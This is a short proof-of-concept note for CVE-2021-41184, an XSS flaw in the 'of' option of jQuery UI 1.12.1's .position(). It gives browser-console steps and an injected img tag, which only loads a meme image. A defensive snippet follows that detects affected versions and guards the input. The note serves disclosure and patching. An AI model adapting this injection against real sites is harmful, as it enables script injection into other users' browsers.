Exploit Medium CVE-2021-41184 XSS in the "of" option of the .position() util
1. jQuery UI version v1.12.1 is vulnerable
1.1 https://www.website.com/_js/jquery/jquery-ui-1.12.1/jquery-ui.min.js
------------------------------------------------Proof of concept------------------------------------------------------------
1. Open the URL
2. Open Inspect
3. Look for an ID among the site's elements
3.1 #ID
4. Go to the Console tab
5. Inject the script using the ID selected at point 3.1
5.1 Script
$("#id").position( {
    my: "center",
    at: "right bottom",
    of: "<img scr='https://media.makeameme.org/created/xss-xss-everywhere-5b8065.jpg' src='' />",
    collision: "none"
});
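
Defensive check for the issue shown above, as an added example that is not part of the original note or of jQuery UI itself: it flags script URLs that load a jQuery UI build older than 1.13.0 (the release that fixed CVE-2021-41184) and guards the "of" value on sites that cannot upgrade yet. The function names and the sample URLs are assumptions made for illustration.

```javascript
// Added example: inventory check and input guard for CVE-2021-41184.
// FIXED_IN is the jQuery UI release that patched the issue (1.13.0).
const FIXED_IN = [1, 13, 0];

// Pull a jQuery UI version out of a script URL such as
// ".../jquery-ui-1.12.1/jquery-ui.min.js". Returns null if none is present.
function jqueryUiVersionFromUrl(url) {
  const m = /jquery-ui[-\/.]v?(\d+)\.(\d+)\.(\d+)/i.exec(url);
  return m ? m.slice(1, 4).map(Number) : null;
}

// True when the version tuple is older than the fixed release.
function isAffected(version) {
  for (let i = 0; i < 3; i++) {
    if (version[i] !== FIXED_IN[i]) return version[i] < FIXED_IN[i];
  }
  return false;
}

// Return the script URLs that load an affected jQuery UI build.
function findAffectedScripts(urls) {
  return urls.filter((u) => {
    const v = jqueryUiVersionFromUrl(u);
    return v !== null && isAffected(v);
  });
}

// Guard for code that must keep running on an affected build: accept a string
// "of" value only if it cannot be parsed as markup. Any "<" is rejected, which
// is stricter than jQuery's own HTML detection. Non-strings (elements, events,
// jQuery objects) pass through unchanged.
function safePositionOf(of) {
  if (typeof of === "string" && of.includes("<")) {
    throw new TypeError("position(): 'of' must be a selector, not markup");
  }
  return of;
}

// Constructed sample input, not taken from a real site.
const sampleScripts = [
  "https://example.test/_js/jquery/jquery-ui-1.12.1/jquery-ui.min.js",
  "https://example.test/js/jquery-ui-1.13.2/jquery-ui.min.js",
  "https://example.test/js/app.bundle.js",
];
console.log(findAffectedScripts(sampleScripts));
```

On an affected build, wrap untrusted values as `of: safePositionOf(value)` before calling .position(); upgrading to 1.13.0 or later removes the need for the guard.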